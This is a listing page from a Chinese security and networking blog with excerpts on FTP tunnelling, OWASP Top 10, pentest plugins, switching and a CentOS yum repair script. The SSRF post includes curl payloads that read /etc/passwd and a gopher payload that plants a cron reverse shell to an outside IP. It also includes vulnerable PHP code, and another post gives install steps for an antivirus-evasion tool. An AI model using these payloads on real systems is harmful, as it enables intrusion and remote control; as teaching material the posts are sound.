首页
统计
Search
1
MIUI13 Adb精简脚本
879 阅读
2
J3455群晖睿频问题解决
427 阅读
3
centos7.9 2009 误删python2.7,导致yum失效解决方法
336 阅读
4
渗透测试常用的浏览器插件
332 阅读
5
Win10 Webdav一键开启
275 阅读
默认分类
测试
破解软件
登录
Search
Skycyan
累计撰写
62
篇文章
累计收到
47
条评论
首页
栏目
默认分类
测试
破解软件
页面
统计
搜索到
62
篇与
的结果
2022-03-01
FileZilla搭建FTP服务器并使用FRP穿透到公网
服务端操作启动服务器进入服务器管理创建用户添加共享目录FRP代理端代理主端口21代理被动端口这里我们第一个FTP被动端口使用44311再创建一个44312端口的映射调整FTP服务端的被动模式端口范围客户端添加站点调整最大可连接数使用FileZilla自动返回服务器地址设置客户端线程成功连接
2022年03月01日
53 阅读
1 评论
1 点赞
2021-01-30
此内容被密码保护
加密文章,请前往内页查看详情
2021年01月30日
16 阅读
0 评论
5 点赞
2021-01-12
免杀工具-FourEye
一、简介快速生成免杀exe可执行文件,目前拥有三种免杀的方法二、下载及安装1.下载到本地git clone https://github.com/lengjibo/FourEye.git2.安装需要的python库pip install -r requirements.txt3.运行软件python3 BypassFramework.pylist 显示可生成软件shellcode 显示可选择的免杀方式注意:如果报错请安装mingw环境apt-get install gcc-mingw-w64-x86-64 g++-mingw-w64-x86-64 wine64
2021年01月12日
111 阅读
0 评论
1 点赞
2021-01-01
OWASP Top 10 漏洞详解
TOP1-注入当不受信任的数据作为命令或查询的一部分发送到解释器时,会发生注入漏洞,例如SQL,NoSQL,OS,LDAP注入(轻量目录访问协议),xpath(XPath即为XML路径语言,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言),HQL注入等。危害如下:注入可以导致数据丢失或被破坏,缺乏可审计性或拒绝服务。注入漏洞有时甚至可导致完全接管主机。如何防范:使用安全的API,避免使用解释器对输入的特殊的字符进行ESCAPE转义处理。例如:LIKE '%xxx%' ESCAPE ‘xxx’使用ESCAPE关键字定义了转义字符“xxx”,告诉DBMS将搜索字符串“%xxx%”中的第二个百分符(%)作为实际值,而不是通配符使用白名单来规范化的输入验证方法TOP2-失效的身份认证和会话管理(破损认证)与认证和会话管理相关的应用程序功能往往得不到正确实施,导致了攻击者可以破坏密码,密钥,会话令牌或实施漏洞冒充其他用户身份。危害如下:这些漏洞可能导致部分甚至全部账户遭受攻击,一旦攻击成功,攻击者就能执行合法的任何操作如何防范:使用内置的会话管理功能通过认证的问候使用单一的入口点确保在一开始登录SSL保护的网页TOP3-XSS(跨站脚本攻击)跨站脚本是经常出现在web应用中的安全漏洞,其允许恶意web用户将代码植入到提供给其他用户使用的页面中,这些代码包括HTML代码和客户端脚本。黑客界公识是xss是新型的“缓冲区溢出攻击”危害如下:攻击者在受害者浏览器中执行脚本以劫持用户会话,插入恶意内容,重定向用户,使用恶意软件劫持用户浏览器等。种类:存储型`,`反射型`,`DOM型如何防范:验证输入编码输出(用来确保输入的字符被视为数据,而不是作为html被浏览器所解析)TOP4-不安全的对象直接引用一个已经授权的用户通过更改访问时的一个参数,从而访问到原本其并没有得到授权的对象。危害如下:这种漏洞可以损坏参数所引用的所有数据如何防范:使用基于用户或会话的间接对象访问,这样可防止攻击者直接攻击为授权资源访问检查:对任何来自不受信源所使用的所有对象进行访问控制检查避免在url或网页中直接引用内部文件名或数据库关键字验证用户输入和url请求,拒绝包含./ ../的请求TOP5-跨站请求伪造(CSRF)跨站请求伪造,攻击者通过用户的浏览器注入额外的网络请求,破坏网络会话的完整性。浏览器的安全策略是允许当前界面发送到任何地址,因此也意味着如果用户浏览了自己无法控制的资源时,攻击者可以通过控制页面的内容来控制浏览器,发送其精心构造的请求,这些精心构造的请求很难和合法的请求区分开。危害如下:攻击者可以让受害者用户修改任何允许修改的数据,执行任何用户允许的操作,例如修改密码,登录注销等。如何防范:给每个HTTP请求添加一个不可预测的令牌,并保证该令牌对每个用户会话来说是唯一的。最好的办法就是将独有的令牌包含在隐藏字段中,通过HTTP请求发送,避免在URL中暴露出来。要求用户重新认证或判断他们是一个真实的用户。TOP6-安全配置错误安全配置错误可以发生在一个应用程序堆栈的任何层面,包括平台,web服务器,应用服务器,数据库,架构和自定义的代码。攻击者通过访问默认账户,未使用的网页,未安装的补丁的漏洞,未被保护的文件和目录等,以获得对系统为授权的访问。危害如下;系统可能在未知的情况下被完全攻破,用户数据可能随着时间被全部盗走或篡改。甚至导致整个系统被完全破坏如何防范:自动化安装部署及时了解并部署每个环节的软件更新和补丁信息实施漏洞扫描和安全审计TOP7-限制URL访问失败(缺少功能级访问控制)这个漏洞也是与认证相关的,这种漏洞具体是指在系统已经对url的访问做了限制的情况下,但这种限制并没有生效。常见的例子是系统没有对用户进行角色的检查,以及用户通过修改URL的action并指向未被授权页面就能访问该页面同样是个漏洞危害如下:攻击者很容易就能把网址改成享有特权的网页,这样就可以使用匿名或普通用户访问未授保护的私人页面,从而提升未授权功能和相关数据信息如何防范:检查管理权限的过程并确保能够容易进行升级和审计默认缺省情况下,应该拒绝所有访问的执行权限。对于每个功能得访问,需要明确的角色授权检查每个功能分配的权限合理有效TOP8-未验证的重定向和转发在Web应用中重定向是极为普通的,并且通常重定向所引发的目的是带有用户输入参数的目的url,而如果这些重定向未被验证,那么攻击者就可以引导用户访问他们想要用户访问的站点。同样,转发也是极为普遍的,本质上转发是在同一个应用中对一个新页面发送请求,并且有时是用参数来定义目标页面的。同样,如果参数未被验证,那么攻击者就可以利用其来绕过认证或是授权检查危害如下:攻击者通过重定向可以试图安装恶意软件或诱使受害人泄露密码等铭感信息,通过转发可以绕过访问限制如何防范:避免使用重定向和转发如果使用了,不要在确定目标时涉及到用户参数如果无法避免使用用户参数,则应确保目标参数值对于当前用户是有效的并已授权如果是需要登录的,可以从session当中获取登录信息,然后判断TOP9-应用已知漏洞的组件组件(例如库,框架和其他软件模块)以与应用程序相同的权限运行。如果利用易受攻击的组件,这种攻击可能会导致严重的数据丢失或服务器接管。使用具有已知漏洞的组件的应用程序和API可能会破坏应用程序防御并实现各种攻击和破坏。如何防范:识别正在使用的组件和版本,包括所有的依赖更新组件或引用的库文件到最新建立安全策略来管理组件的使用TOP10-敏感信息暴露由于代码编写不严谨或应用固有的功能,造成网站服务器信息被非法获取,属于一种低危漏洞。
2021年01月01日
199 阅读
0 评论
0 点赞
2020-12-28
渗透测试常用的浏览器插件
Proxy SwitchyOmegaChrome 和 Firefox 浏览器上的代理扩展程序,可以轻松快捷的管理和切换多个代理设置。官方网站:https://proxy-switchyomega.com/下载地址:https://proxy-switchyomega.com/file/Proxy-SwitchyOmega-Chromium-2.5.15.crxWappalyzer一款强大的网站技术栈嗅探工具,Wappalyzer官方版插件能够快速识别一个网站用到的前后端技术框架、运行容器、脚本库等,Wappalyzer还提供跨平台实用程序,能够发现网站上使用的技术,还可以检测内容管理系统,电子商务平台,Web框架,服务器软件,分析工具等。下载地址:https://chrome.google.com/webstore/detail/gppongmhjkpfnbhagpmjfkannfbllamg官方网站:https://www.wappalyzer.com/
2020年12月28日
332 阅读
11 评论
0 点赞
2020-12-17
SSRF漏洞攻击与防御
1.概述SSRF(Server-side Request Forge, 服务端请求伪造)。由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。2.SSRF的危害1.扫内网2.向内部任意主机的任意端口发送精心构造的Payload3.DOS攻击(请求大文件,始终保持连接Keep-Alive Always)4.攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sqli等)5.利用file协议读取本地文件等3.漏洞利用CURL支持协议dict protocol (操作Redis)curl -vvv 'dict://127.0.0.1:6379/info'file protocol (任意文件读取)curl -vvv 'file:///etc/passwd'gopher protocol (一键反弹Bash)注意: 链接使用单引号,避免$变量问题curl -vvv 'gopher://127.0.0.1:6379/_1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a/1 bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'<?php function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } $url = $_GET['url']; curl($url); ?>漏洞代码testssrf.php(未作任何SSRF防御)
2020年12月17日
59 阅读
0 评论
1 点赞
2020-12-10
广播危害及广播隔离
广播的危害1.增加终端/设备的负担,安全性/病毒传播广播隔离1.路由器、防火墙、三层交换机(物理隔离)缺点:成本高,不灵活2.VLAN(交换机层面实现的逻辑隔离)缺点:可靠性不足,可以通过VLAN ID实现跨域通信优点:方便灵活,成本低VLAN技术详解交换机开启VLAN后,每个VLAN存在一个ID通过端口建立VLAN表实现对数据通信的隔离(静态VLAN)通过MAC地址建立VLAN表实现对数据通信的隔离(动态VLAN)通过8021.x端口认证基于账号划分VLAN默认VLAN交换机默认存在5个VLAN,其中VLAN1默认包含全部端口#TRUNK链路/公共链路/中继链路技术作用:使所有VLAN数据通过trunk链路原理:交换机在所有数据帧上加标签,用于区别不同的VLANtrunk标签ISL标签:cisco私有的标签,标签大小30字节,26+4字节属于内部标签802.1q标签:共有协议所有厂家均支持标签大小4字节交换机端口链路类型:接入端口:一般也称access口,一般用于连接PC。只能属于一个VLAN中继端口:trunk端口,一般用于连接其他交换机,属于公共端口,允许所有VLAN数据的通过。
2020年12月10日
143 阅读
0 评论
1 点赞
2020-12-07
交换机工作原理及交换机基本常识
1.收到一个数据帧后:首先学习帧中的原MAC地址来形成MAC地址表2.检查帧中的目标MAC地址,并匹配MAC地址表:如MAC地址表中有匹配,则单播转发如MAC地址表中无匹配,则除接收端口外广播转发3.MAC地址表老化时间默认为300秒交换机接口类型1.E 十兆口 2.F 百兆口 3.G 千兆口 4.Te万兆口速率自适应速率匹配失败则会 F1/0 1为模块号/0为端口号端口状态:down/updown的三种状态1.手工停用 2.速率不匹配 3.双工模式不匹配(duplex),双工模式有三种单工,双工,半双工交换机的工作模式1.用户模式:可以查看交换机的基本简单信息,不能修改任何配置 2.特权模式:用户模式下输入enable,进入#状态,该模式下能查看所有配置,但不能修改,能做初始化,测试等操作。 3.配置模式:特权模式下输入configure terminal,该模式下默认不能查看配置,能修改配置且全局生效 4.接口模式:配置模式下输入interface 接口号,该模式下默认不能产看配置,能修改配置且仅对接口生效
2020年12月07日
101 阅读
0 评论
13 点赞
2020-12-02
centos7.9 2009 误删python2.7,导致yum失效解决方法
一键脚本python-yum.sh<!--more--> #临时文件目录准备 cd /root/ mkdr yum cd ./yum #下载相关资源包 wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/dbus-python-devel-1.1.1-9.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/libxml2-python-2.9.1-6.el7.5.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-2.7.5-89.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-backports-1.0-8.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-backports-ssl_match_hostname-3.5.0.1-1.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-chardet-2.2.1-3.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-iniparse-0.4-9.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-ipaddress-1.0.16-2.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-kitchen-1.1.1-5.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-libs-2.7.5-89.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-pycurl-7.19.0-19.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-setuptools-0.9.8-7.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-urlgrabber-3.10-10.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/rpm-python-4.11.3-45.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-3.4.3-168.el7.centos.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-metadata-parser-1.1.4-10.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-plugin-aliases-1.1.31-54.el7_8.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-plugin-fastestmirror-1.1.31-54.el7_8.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-plugin-protectbase-1.1.31-54.el7_8.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-utils-1.1.31-54.el7_8.noarch.rpm #安装相关拓展包 rpm -Uvh RPM* yum* python* lib* db* #测试python python exit () #测试yum yum list
2020年12月02日
336 阅读
8 评论
-6 点赞
2020-11-30
中国法律大全
《中国法律大全》.rar
2020年11月30日
58 阅读
0 评论
12 点赞
1
...
5
6
7